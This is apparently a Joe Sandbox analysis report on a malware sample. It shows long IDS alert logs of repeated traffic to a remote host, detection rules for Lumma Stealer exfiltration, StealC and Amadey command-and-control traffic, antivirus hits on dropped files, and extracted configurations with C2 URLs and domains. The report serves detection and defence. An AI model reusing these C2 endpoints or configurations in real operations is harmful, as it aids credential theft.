2024-11-15T14:15:32.200911+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50511	185.208.158.202	80	TCP
2024-11-15T14:15:33.242277+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50513	185.208.158.202	80	TCP
2024-11-15T14:15:34.284296+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50514	185.208.158.202	80	TCP
2024-11-15T14:15:35.705136+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50515	185.208.158.202	80	TCP
2024-11-15T14:15:36.746368+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50517	185.208.158.202	80	TCP
2024-11-15T14:15:37.772307+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50518	185.208.158.202	80	TCP
2024-11-15T14:15:38.813289+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50519	185.208.158.202	80	TCP
2024-11-15T14:15:39.887439+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50521	185.208.158.202	80	TCP
2024-11-15T14:15:40.944784+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50522	185.208.158.202	80	TCP
2024-11-15T14:15:42.017256+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50524	185.208.158.202	80	TCP
2024-11-15T14:15:43.075620+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50525	185.208.158.202	80	TCP
2024-11-15T14:15:44.126219+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50527	185.208.158.202	80	TCP
2024-11-15T14:15:45.155514+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50528	185.208.158.202	80	TCP
2024-11-15T14:15:46.217824+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50529	185.208.158.202	80	TCP
2024-11-15T14:15:47.260664+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50531	185.208.158.202	80	TCP
2024-11-15T14:15:48.296099+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50532	185.208.158.202	80	TCP
2024-11-15T14:15:49.318032+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50534	185.208.158.202	80	TCP
2024-11-15T14:15:50.362162+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50535	185.208.158.202	80	TCP
2024-11-15T14:15:51.398246+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50536	185.208.158.202	80	TCP
2024-11-15T14:15:52.436913+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50538	185.208.158.202	80	TCP
2024-11-15T14:15:53.497457+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50539	185.208.158.202	80	TCP
2024-11-15T14:15:54.528644+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50541	185.208.158.202	80	TCP
2024-11-15T14:15:55.579328+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50542	185.208.158.202	80	TCP
2024-11-15T14:15:56.657419+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50544	185.208.158.202	80	TCP
2024-11-15T14:15:57.709286+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50545	185.208.158.202	80	TCP
2024-11-15T14:15:58.759050+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50546	185.208.158.202	80	TCP
2024-11-15T14:15:59.794331+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50548	185.208.158.202	80	TCP
2024-11-15T14:16:00.857797+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50549	185.208.158.202	80	TCP
2024-11-15T14:16:01.905135+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50551	185.208.158.202	80	TCP
2024-11-15T14:16:02.939497+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50552	185.208.158.202	80	TCP
2024-11-15T14:16:03.985230+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50554	185.208.158.202	80	TCP
2024-11-15T14:16:05.031779+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50555	185.208.158.202	80	TCP
2024-11-15T14:16:06.071095+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50556	185.208.158.202	80	TCP
2024-11-15T14:16:07.102507+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50558	185.208.158.202	80	TCP
2024-11-15T14:16:08.153826+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50559	185.208.158.202	80	TCP
2024-11-15T14:16:09.203031+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50561	185.208.158.202	80	TCP
2024-11-15T14:16:10.247450+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50562	185.208.158.202	80	TCP
2024-11-15T14:16:11.280663+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50563	185.208.158.202	80	TCP
2024-11-15T14:16:12.319538+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50566	185.208.158.202	80	TCP
2024-11-15T14:16:13.365655+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50567	185.208.158.202	80	TCP
2024-11-15T14:16:14.441077+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50569	185.208.158.202	80	TCP
2024-11-15T14:16:15.642771+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50572	185.208.158.202	80	TCP
2024-11-15T14:16:16.652145+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50574	185.208.158.202	80	TCP
2024-11-15T14:16:17.681611+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50575	185.208.158.202	80	TCP
2024-11-15T14:16:18.881136+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50576	185.208.158.202	80	TCP
2024-11-15T14:16:19.979122+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50578	185.208.158.202	80	TCP
2024-11-15T14:16:21.004306+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50580	185.208.158.202	80	TCP
2024-11-15T14:16:22.070022+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50582	185.208.158.202	80	TCP
2024-11-15T14:16:23.108264+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50583	185.208.158.202	80	TCP
2024-11-15T14:16:24.189191+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50585	185.208.158.202	80	TCP
2024-11-15T14:16:25.259332+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50586	185.208.158.202	80	TCP
2024-11-15T14:16:26.354095+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50587	185.208.158.202	80	TCP
2024-11-15T14:16:27.382459+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50589	185.208.158.202	80	TCP
2024-11-15T14:16:28.443334+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50590	185.208.158.202	80	TCP
2024-11-15T14:16:29.503584+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50592	185.208.158.202	80	TCP
2024-11-15T14:16:30.534471+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50593	185.208.158.202	80	TCP
2024-11-15T14:16:31.578340+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50594	185.208.158.202	80	TCP
2024-11-15T14:16:32.637436+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50597	185.208.158.202	80	TCP
2024-11-15T14:16:33.717080+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50598	185.208.158.202	80	TCP
2024-11-15T14:16:34.758619+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50600	185.208.158.202	80	TCP
2024-11-15T14:16:35.801030+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50601	185.208.158.202	80	TCP
2024-11-15T14:16:36.830722+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50603	185.208.158.202	80	TCP
2024-11-15T14:16:37.869751+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50604	185.208.158.202	80	TCP
2024-11-15T14:16:39.169247+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50605	185.208.158.202	80	TCP
2024-11-15T14:16:40.198367+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50607	185.208.158.202	80	TCP
2024-11-15T14:16:41.235057+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50608	185.208.158.202	80	TCP
2024-11-15T14:16:42.282888+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50611	185.208.158.202	80	TCP
2024-11-15T14:16:43.329341+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50612	185.208.158.202	80	TCP
2024-11-15T14:16:44.365447+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50614	185.208.158.202	80	TCP
2024-11-15T14:16:45.395935+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50615	185.208.158.202	80	TCP
2024-11-15T14:16:46.427683+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50616	185.208.158.202	80	TCP
2024-11-15T14:16:47.434072+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50618	185.208.158.202	80	TCP
2024-11-15T14:16:48.459495+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50619	185.208.158.202	80	TCP
2024-11-15T14:16:49.500449+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50621	185.208.158.202	80	TCP
2024-11-15T14:16:50.533578+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50622	185.208.158.202	80	TCP
2024-11-15T14:16:51.587959+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50623	185.208.158.202	80	TCP
2024-11-15T14:16:52.642079+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50626	185.208.158.202	80	TCP
2024-11-15T14:16:54.717182+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50627	185.208.158.202	80	TCP
2024-11-15T14:16:55.736163+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50629	185.208.158.202	80	TCP
2024-11-15T14:16:56.766939+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50630	185.208.158.202	80	TCP
2024-11-15T14:16:57.826545+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50632	185.208.158.202	80	TCP
2024-11-15T14:16:58.880353+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50633	185.208.158.202	80	TCP
2024-11-15T14:16:59.910377+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50635	185.208.158.202	80	TCP
2024-11-15T14:17:00.953800+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50636	185.208.158.202	80	TCP
2024-11-15T14:17:01.977000+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50638	185.208.158.202	80	TCP
2024-11-15T14:17:03.021323+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50640	185.208.158.202	80	TCP
2024-11-15T14:17:04.049536+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50641	185.208.158.202	80	TCP
2024-11-15T14:17:05.058249+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50643	185.208.158.202	80	TCP
2024-11-15T14:17:06.078598+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50644	185.208.158.202	80	TCP
2024-11-15T14:17:07.135155+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50645	185.208.158.202	80	TCP
2024-11-15T14:17:08.155448+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50647	185.208.158.202	80	TCP
2024-11-15T14:17:09.166236+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50648	185.208.158.202	80	TCP
2024-11-15T14:17:10.201615+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50650	185.208.158.202	80	TCP
2024-11-15T14:17:11.255924+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50651	185.208.158.202	80	TCP
2024-11-15T14:17:12.318518+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50654	185.208.158.202	80	TCP
2024-11-15T14:17:13.334117+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50655	185.208.158.202	80	TCP
2024-11-15T14:17:14.364238+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50656	185.208.158.202	80	TCP
2024-11-15T14:17:15.421217+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50658	185.208.158.202	80	TCP
2024-11-15T14:17:16.463400+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50659	185.208.158.202	80	TCP
2024-11-15T14:17:17.511361+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50661	185.208.158.202	80	TCP
2024-11-15T14:17:18.517728+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50662	185.208.158.202	80	TCP
2024-11-15T14:17:19.537314+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50663	185.208.158.202	80	TCP
2024-11-15T14:17:20.548935+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50665	185.208.158.202	80	TCP
2024-11-15T14:17:21.597078+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50666	185.208.158.202	80	TCP
2024-11-15T14:17:23.678493+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50669	185.208.158.202	80	TCP
2024-11-15T14:17:24.695362+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50670	185.208.158.202	80	TCP
2024-11-15T14:17:25.765208+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50672	185.208.158.202	80	TCP
2024-11-15T14:17:26.811418+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50673	185.208.158.202	80	TCP
2024-11-15T14:17:27.829288+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50675	185.208.158.202	80	TCP
2024-11-15T14:17:28.903123+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50676	185.208.158.202	80	TCP
2024-11-15T14:17:29.940491+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50677	185.208.158.202	80	TCP
2024-11-15T14:17:31.047583+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50679	185.208.158.202	80	TCP
2024-11-15T14:17:32.070805+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50681	185.208.158.202	80	TCP
2024-11-15T14:17:33.117920+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50683	185.208.158.202	80	TCP
2024-11-15T14:17:34.168336+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50684	185.208.158.202	80	TCP
2024-11-15T14:17:35.225801+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50686	185.208.158.202	80	TCP
2024-11-15T14:17:36.321993+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50687	185.208.158.202	80	TCP
2024-11-15T14:17:37.379479+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50688	185.208.158.202	80	TCP
2024-11-15T14:17:38.384429+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50690	185.208.158.202	80	TCP
2024-11-15T14:17:39.432884+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50691	185.208.158.202	80	TCP
2024-11-15T14:17:40.460494+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50693	185.208.158.202	80	TCP
2024-11-15T14:17:41.478010+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50694	185.208.158.202	80	TCP
2024-11-15T14:17:42.504457+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50696	185.208.158.202	80	TCP
2024-11-15T14:17:43.521022+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50698	185.208.158.202	80	TCP
2024-11-15T14:17:44.631226+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50699	185.208.158.202	80	TCP
2024-11-15T14:17:45.636740+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50701	185.208.158.202	80	TCP
2024-11-15T14:17:46.704973+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50702	185.208.158.202	80	TCP
2024-11-15T14:17:47.753363+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50704	185.208.158.202	80	TCP
2024-11-15T14:17:48.757919+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50705	185.208.158.202	80	TCP
2024-11-15T14:17:49.746878+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50706	185.208.158.202	80	TCP
2024-11-15T14:17:50.758400+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50708	185.208.158.202	80	TCP
2024-11-15T14:17:51.783100+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50709	185.208.158.202	80	TCP
2024-11-15T14:17:53.022900+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50711	185.208.158.202	80	TCP
2024-11-15T14:17:54.056489+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50713	185.208.158.202	80	TCP
2024-11-15T14:17:55.074786+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50714	185.208.158.202	80	TCP
2024-11-15T14:17:56.103528+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50716	185.208.158.202	80	TCP
2024-11-15T14:17:57.160287+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50717	185.208.158.202	80	TCP
2024-11-15T14:17:58.171483+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50719	185.208.158.202	80	TCP
2024-11-15T14:17:59.202553+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50720	185.208.158.202	80	TCP
2024-11-15T14:18:00.206738+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50722	185.208.158.202	80	TCP
2024-11-15T14:18:01.284982+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50723	185.208.158.202	80	TCP
2024-11-15T14:18:02.282557+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50724	185.208.158.202	80	TCP
2024-11-15T14:18:03.305465+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50726	185.208.158.202	80	TCP
2024-11-15T14:18:04.332647+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50727	185.208.158.202	80	TCP
2024-11-15T14:18:05.359090+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50729	185.208.158.202	80	TCP
2024-11-15T14:18:06.408504+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50730	185.208.158.202	80	TCP
2024-11-15T14:18:07.426790+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50731	185.208.158.202	80	TCP
2024-11-15T14:18:08.440609+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50733	185.208.158.202	80	TCP
2024-11-15T14:18:09.484583+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50735	185.208.158.202	80	TCP
2024-11-15T14:18:10.525148+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50737	185.208.158.202	80	TCP
2024-11-15T14:18:11.535780+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50738	185.208.158.202	80	TCP
2024-11-15T14:18:12.544500+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50740	185.208.158.202	80	TCP
2024-11-15T14:18:13.555939+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50742	185.208.158.202	80	TCP
2024-11-15T14:18:14.539462+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50743	185.208.158.202	80	TCP
2024-11-15T14:18:15.541296+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50745	185.208.158.202	80	TCP
2024-11-15T14:18:16.567785+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50746	185.208.158.202	80	TCP
2024-11-15T14:18:17.611601+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50747	185.208.158.202	80	TCP
2024-11-15T14:18:18.619893+0100	2050112	1	A Network Trojan was detected	192.168.2.4	50749	185.208.158.202	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:32.858950+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49950	104.21.80.55	443	TCP
2024-11-15T14:11:04.257281+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50080	104.21.80.55	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:08.095355+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:10:39.264294+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49990	185.215.113.206	80	TCP
2024-11-15T14:10:58.184112+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50067	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:05.112005+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49797	185.215.113.43	80	TCP
2024-11-15T14:15:10.056144+0100	2856147	1	A Network Trojan was detected	192.168.2.4	50479	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:18.704009+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49810	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:08.544645+0100	2803305	3	Unknown Traffic	192.168.2.4	49816	176.113.115.203	80	TCP
2024-11-15T14:10:20.556229+0100	2803305	3	Unknown Traffic	192.168.2.4	49883	185.215.113.16	80	TCP
2024-11-15T14:10:29.861202+0100	2803305	3	Unknown Traffic	192.168.2.4	49934	185.215.113.16	80	TCP
2024-11-15T14:10:43.646350+0100	2803305	3	Unknown Traffic	192.168.2.4	50016	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:09:10.374228+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:09:24.101545+0100	2803304	3	Unknown Traffic	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:25.393179+0100	2803304	3	Unknown Traffic	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:26.222804+0100	2803304	3	Unknown Traffic	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:26.929410+0100	2803304	3	Unknown Traffic	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:28.632290+0100	2803304	3	Unknown Traffic	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:29.170037+0100	2803304	3	Unknown Traffic	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:33.601147+0100	2803304	3	Unknown Traffic	192.168.2.4	49761	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:11:04.257281+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:32.702294+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50149	104.21.80.55	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\stories[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1332534
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000009.00000002.2128190880.0000000000681000.00000040.00000001.01000000.0000000B.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: e708276138.exe.6304.21.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["3xc1aimbl0w.sbs", "faintbl0w.sbs", "300snails.sbs", "thicktoys.sbs"], "Build id": "LOGS11--LiveTraffic"}
Source: file.exe.4940.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

Machine Learning detection for dropped file

Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C74A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C744440 PK11_PrivDecrypt,	0_2_6C744440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C714420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C714420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7444C0 PK11_PubEncrypt,	0_2_6C7444C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C7925B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C728670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C74A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C72E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C76A730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C770180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7443B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C7443B0
